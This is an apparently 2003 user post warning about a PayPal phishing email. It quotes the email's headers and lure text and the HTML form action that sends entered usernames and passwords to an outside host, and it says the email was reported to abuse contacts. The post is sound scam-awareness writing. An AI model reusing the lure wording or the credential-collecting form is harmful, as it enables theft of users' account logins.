PayPal Scam from dreckis123
To anyone that uses PayPal: If you have any questions if an email is legit or not before you reply, please contact the correct people and verify before you give out your information!
Tonight, I received an email from PayPal Service <service@paypal.com> . Upon opening it, the email looked like a PayPal webpage. Same graphics etc were used.
————————————————-
I viewed the headers to find:
Received: from dreckis123 (h24-76-168-41.vs.shawcable.net [24.76.168.41]) (authenticated bits=0) by usermail.com (8.12.8p1/8.12.6) with SMTP id h4R2PbY1006080 for ; Mon, 26 May 2003 20:29:44 -0600
————————————————-
The email stated:
"Dear PayPal Customer
This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.
The inactive customers are subject to restriction and removal in the next 3 months.
Please confirm your email address and password number by logging in to your PayPal account using the form below":
————————————————-
The idea is to click on the submit button.
When you click on the email after entering your user name and password, it is submitted to dreckis who is a user at phpwebhosting.com
form action="http://summer.phpwebhosting.com/~dreckis/login.php" method="GET" target="_blank"
In other words, this is an email scam to get you to send your paypal username and password into a "3rd party". Who knows how many people have already sent theirs not knowing when it is sending to.
The email has been forwarded to: accessviolation@paypal.com abuse@phpwebhosting.com . I don’t like people who try to < (phish) other peoples usernames and passwords! If you have any questions if an email is legit or not before you reply, please contact the correct people and verify before you give out your information!